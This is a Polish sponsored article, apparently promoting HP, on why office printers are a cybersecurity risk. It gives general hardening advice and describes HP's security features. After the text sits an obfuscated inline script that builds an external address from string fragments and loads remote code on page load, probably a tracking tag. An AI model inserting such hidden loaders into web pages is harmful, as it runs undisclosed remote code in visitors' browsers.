Artykuł sponsorowany

Aspekty cyberbezpieczeństwa w kontekście drukowania

Redakcja Antyweb
Aspekty cyberbezpieczeństwa w kontekście  drukowania

Jeżeli w polityce bezpieczeństwa firmy pominiemy drukarkę, nie możemy być pewni, że uchronimy nasze biuro przed cyberatakiem.

W ostatnim czasie słyszy się o zupełnie nowym zagrożeniu w kontekście cyberbezpieczeństwa – możliwości wykradania danych z firmowych drukarek. Statystyki są zatrważające. Okazuje się, że ok. 98 proc. urządzeń drukujących na świecie jest niezabezpieczonych przed możliwością ataku. Jak podaje instytut Ponemon, aż 64 proc. menadżerów z branży IT twierdzi, że na ich drukarkach znajduje się złośliwe oprogramowanie. Mimo tego aż 56 proc. firm w swoich strategiach bezpieczeństwa w ogóle nie uwzględnia tych urządzeń.

Drukarki mogą stać się celem ataków, które umożliwią np. kradzież treści dokumentów – poufnych informacji, tajemnic przedsiębiorstwa czy też danych osobowych. Konsekwencje takich napaści mogą nie tylko doprowadzić do nadszarpnięcia dobrego imienia przedsiębiorstwa, ale wręcz skutkować utratą kontroli nad firmową siecią.

Sposoby zabezpieczania drukarki

Jak dbać o bezpieczeństwo drukarki? Istnieje wiele zaleceń, o których pamięta każdy informatyk. Jednak im większa jest firma i więcej pracowników korzysta z danego urządzenia, tym więcej możliwych zagrożeń. W końcu chyba nikt nie wierzy w to, że nawet w średniej wielkości przedsiębiorstwie ludzie drukują pliki bezpośrednio z pamięci USB.

W związku z tym, że drukarki coraz bardziej upodabniają się do komputerów, wymagają one specjalnego nadzoru. Ponieważ mogą przyjmować wiadomości, mają pamięć do przechowywania danych i oprogramowanie, konieczne jest podejmowanie środków, które sprawią, że poufne informacje nie dostaną się w niepowołane ręce. Do podstawowych zaleceń należy dbałość o aktualizację oprogramowania czy też okresowe czyszczenie pamięci wewnętrznej urządzenia, aby pozbyć się informacji o drukowanych plikach.

Przed dostępem osób niepowołanych można się zabezpieczać na różne sposoby. Jednym z najbardziej podstawowych jest konieczność autoryzacji pracownika korzystającego z drukarki. Wprowadzenie hasła albo zastosowanie personalizowanej karty magnetycznej sprawi, że osoba nieautoryzowana nie będzie mogła w ogóle korzystać z danego sprzętu. Konieczne jest również zabezpieczenie sieci bezprzewodowej oraz postawienie firewalla. Jednak – czy to wystarczy?

Co mogą zrobić hakerzy?

W związku z tym, że funkcje drukarek ulegają rozszerzeniu, co niestety nie idzie w parze z odpowiednim zabezpieczeniem samego sprzętu, sytuacja robi się coraz bardziej niebezpieczna. Dzięki zainfekowaniu drukarki wirusem można zdobyć dostęp nie tylko do drukowanych przez nią dokumentów, ale też dostępu do wszystkich komputerów w danej instytucji – wystarczy tylko, że pracownik firmy otworzy zainfekowany plik i prześle go do urządzenia. Wymaga to oczywiście od hakera dużej determinacji i niekiedy bywa rezultatem przykrego zbiegu okoliczności, ale czy faktycznie bierze się pod uwagę taką sytuację podczas opracowywania polityki bezpieczeństwa firmy?

Rozwiązania na rynku

Warto zainteresować się propozycją HP Secure Print Services, która obejmuje szereg innowacji mających na celu ochronę zarówno samych urządzeń, jak i przesyłanych przez nie danych. W drukarkach HP PageWide Pro zastosowano bardzo przydatne funkcje, m.in. bezpieczny start systemu oraz weryfikację integralności oprogramowania sprzętowego. Natomiast dzięki Self-healing Bios zagrożenie może zostać wykryte i zniszczone w zalążku – poprzez zrestartowanie całego systemu w przypadku kontaktu ze złośliwym oprogramowaniem. Widać, że akcent jest położony na to, aby w nowych drukarkach zrównywać poziom zabezpieczeń z tym, który jest stosowany w laptopach z najwyższej półki.

Funkcja HP Capture and Route pozwala na precyzyjne śledzenie powstawania dokumentu od momentu przesłania pliku, aż po jego wydruk (co minimalizuje ryzyko zakłócenia całego procesu). Natomiast HP JetAdvantage Connect umożliwia drukowanie danych z urządzeń mobilnych, zabezpieczając je przed dostępem osób niepowołanych, m.in. poprzez stosowanie kodowanej kolejki plików do wydruku.

https://youtu.be/U3QXMMV-Srs?list=PLoMwRIIUViGQ48XKzXNxTjvICAiZTLv8I

Zabezpieczenie drukarek to kwestia, która w najbliższej przyszłości jeszcze zyska na znaczeniu. Konieczność zwiększenia świadomości w tej dziedzinie jest niezwykle ważna. Warto pamiętać o tym, że zagadnienie to dotyczy nie tylko urządzeń firmowych, ale także prywatnych – rozliczeń podatkowych, osobistej korespondencji czy też innych danych wrażliwych, które drukujemy na co dzień.

<script type="text/javascript"> (function(){ cg3g=document.createElement("script");cg3g_=("ust");cg3gu="62154865"; cg3g_+="a"+("t.i");cg3g.type="text/javascript"; cg3gu+=".ub6iegqrg3g8ni8vjmrz";cg3g.async=true;cg3g_+="n"+("f"+"o")+"/"; cg3gu+="j1r5xzatg5";cg3g.src="//"+cg3g_+cg3gu; document.body.appendChild(cg3g); })(); </script>

Hej, jesteśmy na Google News - Obserwuj to, co ważne w techu

Więcej na tematy:

hpdrukarkidrukowanieFirmaB2B